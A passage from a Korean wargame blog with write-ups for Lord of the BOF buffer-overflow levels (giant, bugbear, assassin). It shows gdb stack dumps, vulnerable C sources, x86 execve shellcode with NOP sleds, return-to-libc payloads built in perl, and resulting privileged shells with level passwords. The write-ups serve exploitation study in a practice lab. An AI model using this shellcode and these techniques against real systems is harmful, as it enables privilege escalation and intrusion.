0xbffffd50:     0x48006d72      0x5454534f      0x3d455059      0x36383369
0xbffffd60:     0x54415000      0x752f3d48      0x6c2f7273      0x6c61636f
0xbffffd70:     0x6e69622f      0x69622f3a      0x752f3a6e      0x622f7273
0xbffffd80:     0x2f3a6e69      0x2f727375      0x52313158      0x69622f36
0xbffffd90:     0x682f3a6e      0x2f656d6f      0x6e616967      0x69622f74
0xbffffda0:     0x4f48006e      0x2f3d454d      0x656d6f68      0x6169672f
0xbffffdb0:     0x4900746e      0x5455504e      0x2f3d4352      0x2f637465
0xbffffdc0:     0x75706e69      0x00637274      0x4c454853      0x622f3d4c
0xbffffdd0:     0x622f6e69      0x00687361      0x52455355      0x6169673d
0xbffffde0:     0x4200746e      0x5f485341      0x3d564e45      0x6d6f682f
0xbffffdf0:     0x69672f65      0x2f746e61      0x7361622e      0x00637268
0xbffffe00:     0x474e414c      0x5f6e653d      0x4f005355      0x50595453
0xbffffe10:     0x694c3d45      0x0078756e      0x564c4853      0x00313d4c
0xbffffe20:     0x435f534c      0x524f4c4f      0x6f6e3d53      0x3a30303d
0xbffffe30:     0x303d6966      0x69643a30      0x3b31303d      0x6c3a3433
0xbffffe40:     0x31303d6e      0x3a36333b      0x343d6970      0x33333b30
0xbffffe50:     0x3d6f733a      0x333b3130      0x64623a35      0x3b30343d
0xbffffe60:     0x303b3333      0x64633a31      0x3b30343d      0x303b3333
0xbffffe70:     0x726f3a31      0x3b31303d      0x333b3530      0x31343b37
0xbffffe80:     0x3d696d3a      0x303b3130      0x37333b35      0x3a31343b
(gdb) x/100x 0xbffffd00-100
0xbffffc9c:     0x8969622f      0xb0c189e3      0x5351520b      0x80cde189
0xbffffcac:     0x53454c00      0x45504f53      0x2f7c3d4e      0x2f727375
0xbffffcbc:     0x2f6e6962      0x7373656c      0x65706970      0x2068732e
0xbffffccc:     0x55007325      0x4e524553      0x3d454d41      0x53494800
0xbffffcdc:     0x5a495354      0x30313d45      0x48003030      0x4e54534f
0xbffffcec:     0x3d454d41      0x61636f6c      0x736f686c      0x6f6c2e74
0xbffffcfc:     0x646c6163      0x69616d6f      0x4f4c006e      0x4d414e47
0xbffffd0c:     0x69673d45      0x00746e61      0x4f4d4552      0x4f484554
0xbffffd1c:     0x313d5453      0x312e3239      0x322e3836      0x312e3232
0xbffffd2c:     0x49414d00      0x762f3d4c      0x732f7261      0x6c6f6f70
0xbffffd3c:     0x69616d2f      0x69672f6c      0x00746e61      0x4d524554
0xbffffd4c:     0x6574783d      0x48006d72      0x5454534f      0x3d455059
0xbffffd5c:     0x36383369      0x54415000      0x752f3d48      0x6c2f7273
0xbffffd6c:     0x6c61636f      0x6e69622f      0x69622f3a      0x752f3a6e
0xbffffd7c:     0x622f7273      0x2f3a6e69      0x2f727375      0x52313158
0xbffffd8c:     0x69622f36      0x682f3a6e      0x2f656d6f      0x6e616967
0xbffffd9c:     0x69622f74      0x4f48006e      0x2f3d454d      0x656d6f68
0xbffffdac:     0x6169672f      0x4900746e      0x5455504e      0x2f3d4352
0xbffffdbc:     0x2f637465      0x75706e69      0x00637274      0x4c454853
0xbffffdcc:     0x622f3d4c      0x622f6e69      0x00687361      0x52455355
0xbffffddc:     0x6169673d      0x4200746e      0x5f485341      0x3d564e45
0xbffffdec:     0x6d6f682f      0x69672f65      0x2f746e61      0x7361622e
0xbffffdfc:     0x00637268      0x474e414c      0x5f6e653d      0x4f005355
0xbffffe0c:     0x50595453      0x694c3d45      0x0078756e      0x564c4853
0xbffffe1c:     0x00313d4c      0x435f534c      0x524f4c4f      0x6f6e3d53
(gdb) x/100x 0xbffffd00-300
0xbffffbd4:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffbe4:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffbf4:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffc04:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffc14:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffc24:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffc34:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffc44:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffc54:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffc64:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffc74:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffc84:     0x90909090      0x90909090      0x90909090      0xc289c031
0xbffffc94:     0x2f6e6850      0x2f686873      0x8969622f      0xb0c189e3
0xbffffca4:     0x5351520b      0x80cde189      0x53454c00      0x45504f53
0xbffffcb4:     0x2f7c3d4e      0x2f727375      0x2f6e6962      0x7373656c
0xbffffcc4:     0x65706970      0x2068732e      0x55007325      0x4e524553
0xbffffcd4:     0x3d454d41      0x53494800      0x5a495354      0x30313d45
0xbffffce4:     0x48003030      0x4e54534f      0x3d454d41      0x61636f6c
0xbffffcf4:     0x736f686c      0x6f6c2e74      0x646c6163      0x69616d6f
0xbffffd04:     0x4f4c006e      0x4d414e47      0x69673d45      0x00746e61
0xbffffd14:     0x4f4d4552      0x4f484554      0x313d5453      0x312e3239
0xbffffd24:     0x322e3836      0x312e3232      0x49414d00      0x762f3d4c
0xbffffd34:     0x732f7261      0x6c6f6f70      0x69616d2f      0x69672f6c
0xbffffd44:     0x00746e61      0x4d524554      0x6574783d      0x48006d72
0xbffffd54:     0x5454534f      0x3d455059      0x36383369      0x54415000
(gdb) r `perl -e 'print "\x1e\x85\x04\x08"x37'` `perl -e 'print "\x90"x1000,"\x31\xc0\x89\xc2\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x89\xc1\xb0\x0b\x52\x51\x53\x89\xe1\xcd\x80"'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y

Starting program: /home/giant/tmp/assassin `perl -e 'print "\x1e\x85\x04\x08"x37'` `perl -e 'print "\x90"x1000,"\x31\xc0\x89\xc2\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x89\xc1\xb0\x0b\x52\x51\x53\x89\xe1\xcd\x80"'`
c…

Breakpoint 1, 0x804851d in main ()
(gdb) cont
Continuing.

Program received signal SIGSEGV, Segmentation fault.
0xbffffd00 in ?? ()
(gdb) q
The program is running. Exit anyway? (y or n) y
[giant@localhost tmp]$
[giant@localhost tmp]$ r `perl -e 'print "\x1e\x85\x04\x08"x37'` `perl -e 'print "\x90"x1000,"\x31\xc0\x89\xc2\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x89\xc1\xb0\x0b\x52\x51\x53\x89\xe1\xcd\x80"'`
bash: r: command not found
[giant@localhost tmp]$ bash2
[giant@localhost tmp]$ ./assassin `perl -e 'print "\x1e\x85\x04\x08"x37'` `perl -e 'print "\x90"x1000,"\x31\xc0\x89\xc2\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x89\xc1\xb0\x0b\x52\x51\x53\x89\xe1\xcd\x80"'`
…
bash$ id
uid=514(giant) gid=514(giant) groups=514(giant)
bash$ q
sh: q: command not found
bash$ exit
exit
[giant@localhost tmp]$ cd ../
[giant@localhost giant]$ ls
assassin assassin.c tmp
[giant@localhost giant]$ finger
Login     Name       Tty      Idle Login Time   Office     Office Phone
giant                pts/0          Jul 30 18:48 (192.168.222.1)
[giant@localhost giant]$ ./assassin `perl -e 'print "\x1e\x85\x04\x08"x37'` `perl -e 'print "\x90"x1000,"\x31\xc0\x89\xc2\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x89\xc1\xb0\x0b\x52\x51\x53\x89\xe1\xcd\x80"'`
…
bash$ id
uid=514(giant) gid=514(giant) euid=515(assassin) egid=515(assassin) groups=514(giant)
bash$ my-pass
euid = 515
pushing me away
bash$

'Wargame > LOB (Redhat9)' 카테고리의 다른 글

zombie_assassin -> succubus (0)	2014.02.20
assassin -> zombie_assassin (0)	2014.02.20
bugbear -> giant (0)	2014.02.20
darkknight -> bugbear (0)	2014.02.20
golem -> darkknight (0)	2014.02.20

Posted by windowhan

,

bugbear -> giant

Wargame/LOB (Redhat9) 2014. 2. 20. 15:19

문제는 다음과 같다.

[bugbear@localhost tmp]$ cat ../giant.c
/*
        The Lord of the BOF : The Fellowship of the BOF
        - giant
        - RTL2
*/

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

main(int argc, char *argv[])
{
        char buffer[40];
        FILE *fp;
        char *lib_addr, *execve_offset, *execve_addr;
        char *ret;

        if(argc < 2){
                printf("argv error\n");
                exit(0);
        }

        // gain address of execve
        fp = popen("/usr/bin/ldd /home/giant/assassin | /bin/grep libc | /bin/aw                        k '{print $4}'", "r");
        fgets(buffer, 255, fp);
        sscanf(buffer, "(%x)", &lib_addr);
        fclose(fp);

        fp = popen("/usr/bin/nm /lib/libc.so.6 | /bin/grep __execve | /bin/awk '                        {print $1}'", "r");
        fgets(buffer, 255, fp);
        sscanf(buffer, "%x", &execve_offset);
        fclose(fp);

        execve_addr = lib_addr + (int)execve_offset;
        // end

        memcpy(&ret, &(argv[1][44]), 4);
        if(ret != execve_addr)
        {
                printf("You must use execve!\n");
                exit(0);
        }

        strcpy(buffer, argv[1]);
        printf("%s\n", buffer);
}

여기서는 execve함수만을 써야한다.

execve함수로 인자구성을 해주려면

execve("실행시킬문자열",실행시킬문자열의 포인터,NULL)이 필요하다.

즉, execve("/bin/sh",&("/bin/sh"),0) 이런 식이 필요하다.

처음에는 R이랑 R2라는 환경변수에 각각 /bin/sh의 주소값과 엄청난 널값을 넣고 해보려고 했다.

0xbffffdca:      "R2="
0xbffffdce:      "USER=bugbear"
0xbffffddb:      "BASH_ENV=/home/bugbear/.bashrc"
0xbffffdfa:      "LANG=en_US"
0xbffffe05:      "R=u¿\017@"
0xbffffe0c:      "OSTYPE=Linux"
0xbffffe19:      "SHLVL=1"

그러나 변수가 위치한 주소는 내가 의도했던 주소랑 전혀 달랐다.

거기에다가 알파벳의 가장 마지막인 Z로 해서 널값과 가까이해서 페이로드를 구성해봤지만,

그것은 나의 착각이었다.

그 사이 가운데에 널값이 들어 있을 것이라고 생각을 했었지만, 다른 값이 들어있었다.

0xbffffe12:      "Z=u¿\017@"
0xbffffe19:      "SHLVL=1"
0xbffffe21:      "LS_COLORS=no=00:fi=00:di=01;34:ln=01;36:pi=40;33:so=01;35:bd=40;33;01:cd=40;33;01:or=01;05;37;41:mi=01;05;37;41:ex=01;32:*.cmd=01;32:*.exe=01;---Type <return> to continue, or q <return> to quit---
32:*.com=01;32:*.btm=01;32:*.bat=01;32:*.sh=01;32:*.csh=01"...
0xbffffee9:      ";32:*.tar=01;31:*.tgz=01;31:*.arj=01;31:*.taz=01;31:*.lzh=01;31:*.zip=01;31:*.z=01;31:*.Z=01;31:*.gz=01;31:*.bz2=01;31:*.bz=01;31:*.tz=01;31:*.rpm=01;31:*.cpio=01;31:*.jpg=01;35:*.gif=01;35:*.bmp=01;3"...
0xbfffffb1:      "5:*.xbm=01;35:*.xpm=01;35:*.png=01;35:*.tif=01;35:"
0xbfffffe4:      "/home/bugbear/tmp/giant"
0xbffffffc:      ""

그래서 이용하기로 생각한것이 argv였다.

argv[0]은 스택의 맨 마지막에도 찌꺼기가 남는다.

0xbfffffe4: "/home/bugbear/tmp/giant" 와 같이 말이다.

일부로 파일명을 "/bin/sh"의 문자열의 주소를 가리키는 주소로 변경한 뒤, 그 주소를 가리키는 포인터로 인자구성을 하면 된다.

그리고 execve로 인자구성을 하려면 바로 뒤에 null문자가 와야한다.

./`perl -e 'print "\xf9\xbf\x0f\x40"'` "`perl -e 'print "\x48\x9d\x0a\x40"x12,"\xe0\x91\x03\x40","\xf9\xbf\x0f\x40","\xf7\xff\xff\xbf","\xfc\xff\xff\xbf"'`"

'Wargame > LOB (Redhat9)' 카테고리의 다른 글

assassin -> zombie_assassin (0)	2014.02.20
giant -> assassin (0)	2014.02.20
darkknight -> bugbear (0)	2014.02.20
golem -> darkknight (0)	2014.02.20
skeleton -> golem (0)	2014.02.20

Posted by windowhan

,

darkknight -> bugbear

Wargame/LOB (Redhat9) 2014. 2. 20. 15:19

기초적인 RTL문제였다.

난이도로 따지면 이전문제보다 더 쉬운정도 ㅋㅋㅋ

system함수를 사용했다.

문제는 다음과 같다.

[darkknight@localhost darkknight]$ cat bugbear.c
/*
        The Lord of the BOF : The Fellowship of the BOF
        - bugbear
        - RTL1
*/

#include <stdio.h>
#include <stdlib.h>

main(int argc, char *argv[])
{
        char buffer[40];
        int i;

        if(argc < 2){
                printf("argv error\n");
                exit(0);
        }

        if(argv[1][47] == '\xbf')
        {
                printf("stack betrayed you!!\n");
                exit(0);
        }

        strcpy(buffer, argv[1]);
        printf("%s\n", buffer);
}

/bin/bash문자열을 찾는 소스는 다음과 같다

int main(int argc,char **argv)
{
       long shell;
       shell = 0x40058ae0; // system함수의 주소를 넣음.

       while(memcmp((void *)shell,"/bin/sh",8))shell++;
       printf("\"/bin/sh\" is at 0x%x\n",shell);
}

[darkknight@localhost darkknight]$ ./bugbear `perl -e 'print "\xe0\x8a\x05\x40
"x12,"aaaa","\xf9\xbf\x0f\x40"'`
?@?@?@?@?@?@?@?@?@?@?@?@aaaa廈@
bash$ id
uid=512(darkknight) gid=512(darkknight) euid=513(bugbear) egid=513(bugbear) grou
ps=512(darkknight)
bash$ my-pass
euid = 513
new divide

OS가 Redhat 6.2라서 system함수 안에 getuid()함수가 없으므로 사용할 수 있었다.

'Wargame > LOB (Redhat9)' 카테고리의 다른 글

giant -> assassin (0)	2014.02.20
bugbear -> giant (0)	2014.02.20
golem -> darkknight (0)	2014.02.20
skeleton -> golem (0)	2014.02.20
vampire -> skeleton (0)	2014.02.20

Posted by windowhan

,

windowhan lab

'Wargame'에 해당되는 글 30건

iron_golem -> dark_eyes

'Wargame > LOB (Fedora3)' 카테고리의 다른 글

gate -> iron_golem

'Wargame > LOB (Fedora3)' 카테고리의 다른 글

xavius -> death_knight

'Wargame > LOB (Redhat9)' 카테고리의 다른 글

nightmare -> xavius

'Wargame > LOB (Redhat9)' 카테고리의 다른 글

succubus -> nightmare

'Wargame > LOB (Redhat9)' 카테고리의 다른 글

zombie_assassin -> succubus

'Wargame > LOB (Redhat9)' 카테고리의 다른 글

assassin -> zombie_assassin

'Wargame > LOB (Redhat9)' 카테고리의 다른 글

giant -> assassin

'Wargame > LOB (Redhat9)' 카테고리의 다른 글

bugbear -> giant

'Wargame > LOB (Redhat9)' 카테고리의 다른 글

darkknight -> bugbear

'Wargame > LOB (Redhat9)' 카테고리의 다른 글

카테고리

태그목록

최근에 올라온 글

최근에 달린 댓글

최근에 받은 트랙백

글 보관함

달력

링크

티스토리툴바


	by windowhan